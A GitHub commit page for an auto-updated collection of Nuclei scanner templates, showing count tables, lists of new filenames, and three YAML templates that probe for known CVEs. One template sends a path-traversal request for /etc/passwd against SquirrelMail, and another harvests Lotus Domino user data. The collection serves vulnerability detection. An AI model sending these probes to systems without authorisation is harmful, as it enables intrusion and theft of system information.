Skip to content

Commit

Permalink
Auto Updated
Browse files Browse the repository at this point in the history
  • Loading branch information
test committed Dec 9, 2024
1 parent c184b48 commit 25afb09
Show file tree
Hide file tree
Showing 4,670 changed files with 184,235 additions and 241,318 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
134 changes: 50 additions & 84 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -14,99 +14,65 @@
| CVE-2011 | 10 |
| CVE-2012 | 18 |
| CVE-2013 | 10 |
| CVE-2014 | 33 |
| CVE-2014 | 32 |
| CVE-2015 | 38 |
| CVE-2016 | 31 |
| CVE-2016 | 33 |
| CVE-2017 | 89 |
| CVE-2018 | 175 |
| CVE-2018 | 177 |
| CVE-2019 | 160 |
| CVE-2020 | 262 |
| CVE-2021 | 352 |
| CVE-2022 | 357 |
| CVE-2022 | 359 |
| CVE-2023 | 413 |
| CVE-2024 | 281 |
| Other | 14218 |
| CVE-2024 | 282 |
| Other | 14219 |
| wordpress | 30690 |
## 近几天数量变化情况
|2024-12-02 | 2024-12-03 | 2024-12-04 | 2024-12-05 | 2024-12-06 | 2024-12-07 | 2024-12-08|
|2024-12-03 | 2024-12-04 | 2024-12-05 | 2024-12-06 | 2024-12-07 | 2024-12-08 | 2024-12-09|
|--- | ------ | ------ | ------ | ------ | ------ | ---|
|46998 | 47005 | 47034 | 47082 | 47099 | 47263 | 47302|
|47005 | 47034 | 47082 | 47099 | 47263 | 47302 | 47309|
## 最近新增文件
| templates name |
| --- |
| CVE-2024-11305.yaml |
| 3055795723.yaml |
| 1094100874.yaml |
| 698707595.yaml |
| dlink-nas-rce.yaml |
| 2796080848.yaml |
| 3544869854.yaml |
| 3564201969.yaml |
| swift_performance_lite.yaml |
| 3214791161.yaml |
| 1137414296.yaml |
| 2616960077.yaml |
| 3174237950.yaml |
| 899979758.yaml |
| 3448223885.yaml |
| 3412263252.yaml |
| 1160329386.yaml |
| 270156276.yaml |
| 2399967153.yaml |
| gl-ar300m_firmware.yaml |
| 3153347766.yaml |
| 3983974321.yaml |
| CVE-2024-10046.yaml |
| CVE-2024-11367.yaml |
| cve-2021-24389-5731.yaml |
| cve-2016-1000134-2678.yaml |
| CVE-2024-12270.yaml |
| CVE-2024-12115.yaml |
| CVE-2024-11010.yaml |
| cve-2019-15713-3887.yaml |
| wp-mini-program.yaml |
| CVE-2014-4940-2384.yaml |
| CVE-2024-11451.yaml |
| multi-gallery.yaml |
| cve-2021-24406-5735.yaml |
| CVE-2024-12026.yaml |
| cve-2018-18069-3426.yaml |
| CVE-2015-1000012-2457.yaml |
| edoc-easy-tables.yaml |
| CVE-2024-12165.yaml |
| clicksend-lead-capture-form.yaml |
| CVE-2024-11464.yaml |
| CVE-2024-12166.yaml |
| beautiful-taxonomy-filters.yaml |
| zooom.yaml |
| CVE-2024-11904.yaml |
| CVE-2024-7894.yaml |
| cve-2022-0189-6611.yaml |
| CVE-2020-25213-4863.yaml |
| CVE-2024-11457.yaml |
| CVE-2024-12253.yaml |
| CVE-2024-8679.yaml |
| CVE-2024-11436.yaml |
| CVE-2016-1000153-2736.yaml |
| CVE-2024-11380.yaml |
| library-management-system.yaml |
| CVE-2024-11329.yaml |
| smoove-elementor.yaml |
| CVE-2012-4273-2195.yaml |
| CVE-2024-11374.yaml |
| CVE-2024-12167.yaml |
| CVE-2024-11943.yaml |
| CVE-2020-35489-5044.yaml |
| comfino-payment-gateway.yaml |
| CVE-2012-4768-2206.yaml |
| CVE-2015-9414-2625.yaml |
| CVE-2024-12128.yaml |
| cve-2016-1000149-2727.yaml |
| cve-2021-20792-5479.yaml |
| cf7-mollie.yaml |
| CVE-2024-11501.yaml |
| CVE-2024-12257.yaml |
| CVE-2024-11353.yaml |
| cve-2016-1000135-2684.yaml |
| CVE-2023-50094.yaml |
| CVE-2023-46455.yaml |
| 2670991367.yaml |
| 3007559384.yaml |
| 566696613.yaml |
| 2303335172.yaml |
| 1979985799.yaml |
| 2267868827.yaml |
| 986449258.yaml |
| 3354382629.yaml |
| 902529966.yaml |
| 459431066.yaml |
| 3806638511.yaml |
| path-xss.yaml |
| 640200909.yaml |
| 2124543263.yaml |
| 3230525107.yaml |
| 596766511.yaml |
| 1292911140.yaml |
| cve-2013-2287-2248.yaml |
| cve-2021-25074-5797.yaml |
| cve-2022-1119(1).yaml |
| CVE-2020-11738-4427.yaml |
| cve-2020-29395-5003.yaml |
| CVE-2015-4414-2531.yaml |
| cve-2014-4539-2356.yaml |
| CVE-2016-1000139-2702.yaml |
| CVE-2020-26153-4914.yaml |
| cve-2019-14205-3823.yaml |
| CVE-2013-4117-2265.yaml |
| cve-2012-0896-2133.yaml |
| CVE-2019-6112 2.yaml |
| CVE-2016-1000138-2696.yaml |
| CVE-2021-24335-5703.yaml |
| CVE-2021-24320-5700.yaml |
| CVE-2024-12209.yaml |
| cve-2021-34640-6236.yaml |
| cve-2012-0901-2139.yaml |
| cve-2012-4242-2183.yaml |
| CVE-2021-24472-5743.yaml |
| cve-2011-5106-2094.yaml |
| wp-health.yaml |
| cve-2016-1000153-2733.yaml |
| CVE-2011-5107-2104.yaml |
3 changes: 2 additions & 1 deletion data.json
Original file line number Diff line number Diff line change
Expand Up @@ -274,5 +274,6 @@
"2024-12-05": 47082,
"2024-12-06": 47099,
"2024-12-07": 47263,
"2024-12-08": 47302
"2024-12-08": 47302,
"2024-12-09": 47309
}
44 changes: 43 additions & 1 deletion data1.json
Original file line number Diff line number Diff line change
Expand Up @@ -57884,5 +57884,47 @@
"CVE-2024-11353.yaml": "2024-12-08 02:53:10",
"cve-2016-1000135-2684.yaml": "2024-12-08 02:53:10",
"CVE-2023-50094.yaml": "2024-12-08 02:53:10",
"CVE-2023-46455.yaml": "2024-12-08 02:53:10"
"CVE-2023-46455.yaml": "2024-12-08 02:53:10",
"2670991367.yaml": "2024-12-09 02:50:57",
"3007559384.yaml": "2024-12-09 02:50:57",
"566696613.yaml": "2024-12-09 02:50:57",
"2303335172.yaml": "2024-12-09 02:50:57",
"1979985799.yaml": "2024-12-09 02:50:57",
"2267868827.yaml": "2024-12-09 02:50:57",
"986449258.yaml": "2024-12-09 02:50:57",
"3354382629.yaml": "2024-12-09 02:50:57",
"902529966.yaml": "2024-12-09 02:50:57",
"459431066.yaml": "2024-12-09 02:50:57",
"3806638511.yaml": "2024-12-09 02:50:57",
"path-xss.yaml": "2024-12-09 02:50:57",
"640200909.yaml": "2024-12-09 02:50:57",
"2124543263.yaml": "2024-12-09 02:50:57",
"3230525107.yaml": "2024-12-09 02:50:57",
"596766511.yaml": "2024-12-09 02:50:57",
"1292911140.yaml": "2024-12-09 02:50:57",
"cve-2013-2287-2248.yaml": "2024-12-09 02:50:57",
"cve-2021-25074-5797.yaml": "2024-12-09 02:50:57",
"cve-2022-1119(1).yaml": "2024-12-09 02:50:57",
"CVE-2020-11738-4427.yaml": "2024-12-09 02:50:57",
"cve-2020-29395-5003.yaml": "2024-12-09 02:50:57",
"CVE-2015-4414-2531.yaml": "2024-12-09 02:50:57",
"cve-2014-4539-2356.yaml": "2024-12-09 02:50:57",
"CVE-2016-1000139-2702.yaml": "2024-12-09 02:50:57",
"CVE-2020-26153-4914.yaml": "2024-12-09 02:50:57",
"cve-2019-14205-3823.yaml": "2024-12-09 02:50:57",
"CVE-2013-4117-2265.yaml": "2024-12-09 02:50:57",
"cve-2012-0896-2133.yaml": "2024-12-09 02:50:57",
"CVE-2019-6112 2.yaml": "2024-12-09 02:50:57",
"CVE-2016-1000138-2696.yaml": "2024-12-09 02:50:57",
"CVE-2021-24335-5703.yaml": "2024-12-09 02:50:57",
"CVE-2021-24320-5700.yaml": "2024-12-09 02:50:57",
"CVE-2024-12209.yaml": "2024-12-09 02:50:57",
"cve-2021-34640-6236.yaml": "2024-12-09 02:50:57",
"cve-2012-0901-2139.yaml": "2024-12-09 02:50:57",
"cve-2012-4242-2183.yaml": "2024-12-09 02:50:57",
"CVE-2021-24472-5743.yaml": "2024-12-09 02:50:57",
"cve-2011-5106-2094.yaml": "2024-12-09 02:50:57",
"wp-health.yaml": "2024-12-09 02:50:57",
"cve-2016-1000153-2733.yaml": "2024-12-09 02:50:57",
"CVE-2011-5107-2104.yaml": "2024-12-09 02:50:57"
}
1 change: 1 addition & 0 deletions links.csv
Original file line number Diff line number Diff line change
Expand Up @@ -513,3 +513,4 @@ https://github.com/vulncrax/nuclei-templates
https://github.com/vasuhacks7/Categorized_Nuclei_templates
https://github.com/0xSH4RKS/nuclei-templates
https://github.com/AhmetQara/Nuclei_templates2024
https://github.com/0xDunk/loxs-template
26 changes: 26 additions & 0 deletions nuclei-templates/CVE-2001/CVE-2001-1473.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
id: CVE-2001-1473
info:
name: Deprecated SSHv1 Protocol Detection
author: iamthefrogy
severity: high
tags: cve,cve2001,network,ssh,openssh
description: SSHv1 is deprecated and has known cryptographic issues.
remediation: Upgrade to SSH 2.4 or later.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
classification:
cvss-score: 7.4
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cve-id: CVE-2001-1473
cwe-id: CWE-310
network:
- host:
- "{{Hostname}}"
- "{{Host}}:22"
matchers:
- type: word
words:
- "SSH-1"

# Updated by Chris on 2022/01/21
29 changes: 0 additions & 29 deletions nuclei-templates/CVE-2001/cve-2001-1473.yaml

This file was deleted.

33 changes: 0 additions & 33 deletions nuclei-templates/CVE-2005/CVE-2005-2428.yaml

This file was deleted.

25 changes: 25 additions & 0 deletions nuclei-templates/CVE-2005/cve-2005-2428.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: CVE-2005-2428
info:
name: CVE-2005-2428
author: CasperGN
severity: medium
tags: cve,cve2005
description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495

requests:
- method: GET
path:
- "{{BaseURL}}/names.nsf/People?OpenView"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
name: domino-username
regex:
- '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
part: body
31 changes: 0 additions & 31 deletions nuclei-templates/CVE-2006/CVE-2006-2842.yaml

This file was deleted.

25 changes: 25 additions & 0 deletions nuclei-templates/CVE-2006/cve-2006-2842.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: CVE-2006-2842

info:
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
author: dhiyaneshDk
severity: high
description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
reference: https://www.exploit-db.com/exploits/27948
tags: cve2006,lfi,squirrelmail,cve

requests:
- method: GET
path:
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:[x*]:0:0"

- type: status
status:
- 200
Loading

0 comments on commit 25afb09

Please sign in to comment.